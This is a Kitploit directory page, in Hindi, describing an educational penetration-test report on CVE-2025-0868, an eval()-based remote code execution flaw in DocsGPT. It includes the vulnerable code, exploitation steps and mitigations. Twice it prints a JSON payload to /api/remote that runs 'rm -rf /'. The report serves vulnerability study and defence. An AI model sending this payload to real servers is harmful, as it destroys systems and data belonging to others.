Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-0868 — शैक्षिक पैठ परीक्षण रिपोर्ट जो CVE-2025-0868 के शोषण को प्रदर्शित करती है, जो DocsGPT में असुरक्षित eval() के उपयोग के कारण JSON पार्सिंग में एक गंभीर RCE भेद्यता है, साथ ही शमन रणनीतियाँ। | Kitploit
उपकरण/GitHubGitHub/aidana-gift/cve-2025-0868
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubaidana-gift/cve-2025-0868

CVE-2025-0868

शैक्षिक पैठ परीक्षण रिपोर्ट जो CVE-2025-0868 के शोषण को प्रदर्शित करती है, जो DocsGPT में असुरक्षित eval() के उपयोग के कारण JSON पार्सिंग में एक गंभीर RCE भेद्यता है, साथ ही शमन रणनीतियाँ।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रवेश परीक्षण परियोजना रिपोर्ट: CVE-2025-0868 का शोषण (JSON Eval के माध्यम से DocsGPT RCE)

1. परिचय

20 फरवरी 2025 को ओपन-सोर्स DocsGPT लाइब्रेरी में एक गंभीर रिमोट कोड निष्पादन (RCE) दोष (CVE-2025-0868) का खुलासा किया गया था, जो JSON पेलोड को पार्स करते समय eval() के असुरक्षित उपयोग के कारण हुआ।

मुख्य विवरण:

  • DocsGPT संस्करण 0.8.1 से 0.12.0 को प्रभावित करता है
  • CVSS 4.0 स्कोर 9.3 (गंभीर)
  • अप्रमाणित, नेटवर्क-सुलभ कोड इंजेक्शन की अनुमति देता है
  • गोपनीयता, अखंडता और उपलब्धता पर पूर्ण प्रभाव

CVE-2025-0868 के बारे में

यह कमजोरी हमलावरों को /api/remote एंडपॉइंट के माध्यम से मनमाना पायथन कोड चलाने की अनुमति देती है। DocsGPT एक ओपन-सोर्स जनरेटिव-AI उपकरण है जो GPT मॉडल का उपयोग करके प्रोजेक्ट दस्तावेज़ीकरण को क्वेरी करने में सक्षम बनाता है।

परियोजना उद्देश्य

  • कमजोरी की तकनीकी पृष्ठभूमि का विश्लेषण करना
  • नियंत्रित प्रयोगशाला वातावरण में पुनरुत्पादित करना
  • शोषण प्रभाव का प्रदर्शन करना
  • शमन रणनीतियाँ प्रस्तावित करना
  • निष्कर्ष प्रस्तुत करना

2. कमजोरी विश्लेषण

2.1 कमजोरी अवलोकन

2.2 CVSS 4.0 विभाजन

वेक्टर: AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H
आधार स्कोर: 9.3 (गंभीर)

शोषण क्षमता मीट्रिक:

  • हमला वेक्टर (AV): नेटवर्क (N)
  • हमला जटिलता (AC): निम्न (L)
  • आवश्यक विशेषाधिकार (PR): कोई नहीं (N)
  • उपयोगकर्ता सहभागिता (UI): कोई नहीं (N)

प्रभाव मीट्रिक:

  • गोपनीयता (VC): उच्च
  • अखंडता (VI): उच्च
  • उपलब्धता (VA): उच्च

2.3 तकनीकी गहराई

यह कमजोरी reddit_loader.py में मौजूद है जहां उपयोगकर्ता इनपुट को असुरक्षित eval() फ़ंक्शन का उपयोग करके संसाधित किया जाता है:

root@kitploit:~
def load_data(self, inputs):
    data = eval(inputs)  # Vulnerable code
    client_id = data.get("client_id")
    client_secret = data.get("client_secret")
    user_agent = data.get("user_agent")

यह एक हमलावर को JSON फ़ील्ड के अंदर दुर्भावनापूर्ण पायथन कोड निष्पादित करने की अनुमति देता है: POST /api/remote HTTP/1.1 Content-Type: application/json

{"data": "import('os').system('rm -rf /')"}

DocsGPT में CVE-2025-0868 का शोषण

3. शोषण प्रक्रिया

3.1 प्रयोगशाला वातावरण सेटअप

इस कमजोरी का शोषण करने के लिए, हमने कमजोर वातावरण और एक सुरक्षित कार्य स्थान को पुनः बनाया:

  • वर्चुअल मशीन: Kali Linux 2024
  • DocsGPT संस्करण: 0.12.0 (कमजोर संस्करण: 0.8.0 - 0.12.0)
  • उपयोग किए गए उपकरण: Python, Docker

3.2 शोषण विकास

हमने एक Python स्क्रिप्ट विकसित की जो /api/remote एंडपॉइंट पर एक दुर्भावनापूर्ण पेलोड भेजकर रिमोट कोड निष्पादन (RCE) निष्पादित करती है, eval() के असुरक्षित उपयोग का शोषण करती है।

मुख्य शोषण चरण

  1. टोही: HTTP हेडर के माध्यम से DocsGPT संस्करण की पहचान करें।
  2. कमजोरी परिभाषित करें: /api/remote एंडपॉइंट में RCE।
  3. पेलोड तैयार करना: Python कोड इंजेक्ट करें।
  4. शोषण: /api/remote पर दुर्भावनापूर्ण JSON भेजें।

एक कमजोर अनुरोध का उदाहरण

root@kitploit:~
POST /api/remote HTTP/1.1
Content-Type: application/json

{"data": "__import__('os').system('rm -rf /')"}

4. प्रतिरोधक उपाय और शमन

4.1 तत्काल सुधार

DocsGPT v0.12.1 और बाद के संस्करणों में अपडेट करें

4.2 कोड सुधार

eval() को json.loads() से बदलें।

Link:https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/applicatio n/parser/remote/reddit_loader.py#L9

टूल डाउनलोड करें
श्रेणीविवरण
CVE IDCVE-2025-0868
प्रभावित सॉफ्टवेयरDocsGPT v0.8.1 – v0.12.0
कमजोरी प्रकाररिमोट कोड निष्पादन (RCE)
हमला वेक्टरनेटवर्क-आधारित (/api/remote को HTTP अनुरोध)
मूल कारणअविश्वसनीय JSON इनपुट पर eval() का असुरक्षित उपयोग
प्रभावपूर्ण सर्वर समझौता (मनमाना कमांड निष्पादन)
CWE मैपिंगCWE-77: कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन